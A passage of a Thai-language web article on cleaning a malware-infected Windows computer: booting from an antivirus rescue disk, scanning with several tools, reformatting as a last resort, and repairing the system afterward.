ตอนนี้คลิกที่ปุ่มเพื่อสร้างอุปกรณ์ USB หรือดิสก์ ตัวเลือกใด ๆ เหล่านี้จะเป็นที่ยอมรับ ขึ้นอยู่กับว่าคุณต้องการเรียกใช้ดิสก์ช่วยเหลืออย่างไร - จาก USB หรือจากซีดี

หลังจากสร้างดิสก์ช่วยเหลือแล้ว คุณอาจต้องเปลี่ยนลำดับการบู๊ตในการตั้งค่า BIOS เพื่อให้แน่ใจว่าเมื่อคุณใส่ซีดีที่สามารถบู๊ตได้หรืออุปกรณ์แฟลชที่สามารถบู๊ตได้ คอมพิวเตอร์จะบู๊ตเข้าสู่อุปกรณ์นั้นแทนที่จะเป็นระบบปฏิบัติการตามปกติ ตามจุดประสงค์ของเรา คุณควรจัดเรียงลำดับใหม่เพื่อให้ "ไดรฟ์ CD/DVD Rom" มาก่อนหากคุณต้องการบูตจากซีดีหรือดีวีดี หรือ "อุปกรณ์แบบถอดได้" หากคุณต้องการบูตจากแฟลชไดรฟ์ เมื่อเสร็จแล้ว ให้บูตคอมพิวเตอร์จากดิสก์ช่วยเหลือ

หลังจากบูตจากดิสก์ คุณสามารถเลือกโปรแกรมป้องกันไวรัสที่คุณต้องการเริ่มสแกนคอมพิวเตอร์ของคุณ อย่างที่ผมได้กล่าวไว้ข้างต้น ผมขอแนะนำให้เริ่มต้นด้วย Dr.Web เมื่อโปรแกรมนี้เสร็จสิ้นและคุณได้กู้คืนหรือลบทุกอย่างที่พบแล้ว คุณจะต้องปิดคอมพิวเตอร์ จากนั้นอย่าลืมบูตจากดิสก์อีกครั้ง จากนั้นสแกนต่อด้วยโปรแกรมป้องกันไวรัสอื่นๆ ดำเนินการตามขั้นตอนนี้ต่อไปจนกว่าคุณจะสแกนคอมพิวเตอร์ของคุณด้วยโปรแกรมป้องกันไวรัสทั้งหมดที่คุณรวมไว้ในดิสก์สำหรับบูต

หลังจากทำความสะอาดคอมพิวเตอร์ในโปรแกรมที่คุณเบิร์นลงดิสก์แล้ว ตอนนี้คุณต้องลองเริ่ม Windows อีกครั้ง หากคอมพิวเตอร์สามารถเริ่มทำงานได้ภายใต้ Windows ให้ตรวจสอบโดยใช้คำแนะนำที่ฉันให้ไว้ในบทความ "" หากทุกอย่างเรียบร้อยดี คุณสามารถไปยังส่วน " " ได้ โปรดจำไว้ว่ารายการรีจิสตรีที่ถูกปิดใช้งานไม่สามารถก่อให้เกิดความเสี่ยงได้

หากคอมพิวเตอร์ของคุณยังไม่ได้ทำความสะอาด แต่คุณสามารถบูตจาก Windows ได้ ฉันขอแนะนำให้คุณลองทำความสะอาดในขณะที่อยู่ใน Windows โดยเริ่มจากบทความนี้และปฏิบัติตามวิธีการที่แนะนำ อย่างไรก็ตาม หากคอมพิวเตอร์ของคุณยังคงไม่สามารถบูตเข้าสู่ Windows ได้ ให้ลองดาวน์โหลดอีกครั้งเพื่อใช้แผ่นดิสก์การติดตั้ง Windows ซึ่งจะช่วยให้คอมพิวเตอร์ของคุณเริ่มต้นใหม่ได้ หากวิธีนี้ไม่สามารถช่วยให้สามารถบูตได้ ให้ลองเพิ่มโปรแกรมป้องกันไวรัสเพิ่มเติมลงในดิสก์สำหรับบูตฉุกเฉิน จากนั้นจึงสแกนคอมพิวเตอร์อีกครั้ง หากการทำเช่นนี้ยังไม่ช่วยให้อ่าน

3. จะทำอย่างไรถ้าวิธีการข้างต้นไม่สามารถช่วยทำความสะอาดคอมพิวเตอร์ของคุณได้

หากคุณทำตามขั้นตอนข้างต้นทั้งหมดแล้ว แต่ยังไม่สามารถทำความสะอาดคอมพิวเตอร์ของคุณได้ แต่คุณเชื่อว่ามัลแวร์เป็นสาเหตุของปัญหา เราจะยินดีเป็นอย่างยิ่งหากคุณแสดงความคิดเห็นและอธิบายสิ่งที่คุณพยายามทำเพื่อล้างข้อมูล คอมพิวเตอร์ของคุณและสิ่งที่ยังคงเป็นสัญญาณที่ทำให้คุณคิดว่าคอมพิวเตอร์ยังไม่ได้ทำความสะอาด นี่เป็นสิ่งสำคัญมากในการปรับปรุงบทความนี้ หวังว่าคงไม่มีใครมาถึงส่วนนี้จริงๆ บทความนี้มีวัตถุประสงค์เพื่อให้โอกาสคุณในการล้างคอมพิวเตอร์ที่ติดไวรัสของคุณอย่างสมบูรณ์

คุณยังสามารถขอคำแนะนำจากฟอรัมเฉพาะด้านการกำจัดมัลแวร์โดยเฉพาะ ฟอรัมที่มีประโยชน์มากซึ่งเป็นพันธมิตรของเรา - อย่างไรก็ตาม แม้ว่าหลังจากขอความช่วยเหลือจากฟอรัมการลบมัลแวร์แล้ว คอมพิวเตอร์ของคุณก็ยังไม่มีมัลแวร์ คุณอาจต้องฟอร์แมตคอมพิวเตอร์ของคุณและเรียกใช้ในลักษณะนั้น ซึ่งหมายความว่าคุณจะสูญเสียสิ่งที่คุณไม่ได้คัดลอกไว้ล่วงหน้า หากคุณทำเช่นนี้ อย่าลืมฟอร์แมตคอมพิวเตอร์ของคุณให้สมบูรณ์ก่อนที่จะติดตั้ง Windows ใหม่ วิธีนี้จะทำลายมัลแวร์เกือบทุกประเภท เมื่อติดตั้ง Windows ใหม่แล้ว ให้ทำตามขั้นตอนใน .

4. จะทำอย่างไรหลังจากตรวจพบมัลแวร์ทั้งหมดเพื่อลบออกในที่สุด

เมื่อคุณแน่ใจว่าคอมพิวเตอร์ของคุณสะอาดแล้ว ตอนนี้คุณสามารถลองกู้คืนสิ่งที่คุณทำหายไปได้ คุณสามารถใช้ Windows Repair (All In One) ซึ่งเป็นเครื่องมือแบบครบวงจรที่ช่วยให้คุณสามารถแก้ไขปัญหา Windows ที่ทราบจำนวนมาก รวมถึงข้อผิดพลาดของรีจิสทรี การอนุญาตไฟล์ Internet Explorer, Windows Updates, Windows Firewall หากหลังจากทำตามขั้นตอนทั้งหมดแล้ว คอมพิวเตอร์ของคุณทำงานได้ตามปกติ คุณยังสามารถเปิด Comodo Autorun Analyzer และเลือกตัวเลือกเพื่อลบรายการรีจิสทรีที่คุณปิดใช้งานก่อนหน้านี้เท่านั้น ดังนั้นพวกเขาจะไม่อยู่ในคอมพิวเตอร์ของคุณอีกต่อไป

เมื่อคุณได้ลบการติดไวรัสทั้งหมดออกจากคอมพิวเตอร์ของคุณอย่างปลอดภัย และกำจัดผลร้ายที่หลงเหลืออยู่แล้ว คุณต้องดำเนินการเพื่อให้แน่ใจว่าสิ่งนี้จะไม่เกิดขึ้นอีก ด้วยเหตุนี้ ฉันจึงได้เขียนคู่มือ How to Stay Safe Online (จะเผยแพร่เร็วๆ นี้บนเว็บไซต์ของเรา) โปรดอ่านในภายหลังและใช้วิธีการที่คุณคิดว่าเหมาะสมกับความต้องการของคุณมากที่สุด

หลังจากรักษาความปลอดภัยคอมพิวเตอร์ของคุณแล้ว ตอนนี้คุณสามารถกู้คืนไฟล์ใดๆ ที่สูญหายระหว่างกระบวนการล้างข้อมูลที่เคยสำรองข้อมูลไว้ก่อนหน้านี้ได้ หวังว่าคุณจะไม่ต้องทำตามขั้นตอนนี้ นอกจากนี้ ก่อนที่จะกู้คืน ตรวจสอบให้แน่ใจว่าคอมพิวเตอร์ของคุณได้รับการปกป้องเป็นอย่างดี หากคุณไม่ปกป้องคอมพิวเตอร์ของคุณอย่างเพียงพอ คุณอาจติดเชื้อโดยไม่ได้ตั้งใจ และคุณจะต้องทำความสะอาดคอมพิวเตอร์อีกครั้ง นอกจากนี้ หากคุณใช้อุปกรณ์ USB เพื่อย้ายไฟล์ใดๆ ไปยังคอมพิวเตอร์ที่ติดไวรัส ตอนนี้คุณสามารถแทรกกลับเข้าไปในคอมพิวเตอร์และตรวจสอบให้แน่ใจว่าไม่มีมัลแวร์อยู่ในนั้น ฉันแนะนำให้ทำเช่นนี้โดยการลบไฟล์ที่เหลืออยู่ในนั้น

พบการพิมพ์ผิด? ไฮไลต์แล้วกด Ctrl + Enter
 

อ่าน:


เป็นที่นิยม:

เกิดข้อผิดพลาดอะไรระหว่างการติดตั้ง?

เกิดข้อผิดพลาดอะไรระหว่างการติดตั้ง?

ใหม่

วิธีฟื้นฟูรอบประจำเดือนหลังคลอดบุตร:

ทำไมเพลงไม่เล่นบน VKontakte?

ทำไมเพลงไม่เล่นบน VKontakte?

ตรวจสอบสถานะการเชื่อมต่ออินเทอร์เน็ตของคุณ บางครั้งอาจถูกขัดจังหวะด้วยวิธีที่ไม่คาดคิดที่สุด ซึ่งผู้ใช้จะไม่มีใครสังเกตเห็น....

วิธีเพิ่มขนาดของไดรฟ์ C โดยเสียค่าใช้จ่ายของไดรฟ์ D โดยไม่สูญเสียข้อมูล

วิธีเพิ่มขนาดของไดรฟ์ C โดยเสียค่าใช้จ่ายของไดรฟ์ D โดยไม่สูญเสียข้อมูล

สวัสดีตอนบ่าย. คนส่วนใหญ่ซื้อคอมพิวเตอร์แบบประกอบสำเร็จรูปนั่นคือระบบส่วนประกอบและส่วนประกอบทั้งหมดของคอมพิวเตอร์ติดตั้งไว้...

สาเหตุของการทำงานผิดพลาดบนเมนบอร์ด หากชิปเซ็ตบนเมนบอร์ดเกิดไฟไหม้

สาเหตุของการทำงานผิดพลาดบนเมนบอร์ด หากชิปเซ็ตบนเมนบอร์ดเกิดไฟไหม้

อาการและความผิดปกติของเมนบอร์ด

การใช้สไตล์ใน Excel วิธีสร้างสไตล์ใหม่ของคุณเอง

การใช้สไตล์ใน Excel วิธีสร้างสไตล์ใหม่ของคุณเอง

ในบทความนี้ฉันจะพูดถึงความผิดปกติของเมนบอร์ดหลักและอาการต่างๆ เมื่อวินิจฉัย...
หากคุณใช้ตัวเลือกเดียวกันนี้ในการจัดรูปแบบเซลล์ในเวิร์กชีตในสเปรดชีตของคุณอย่างสม่ำเสมอ การสร้างสไตล์การจัดรูปแบบ... ฟีดรูปภาพ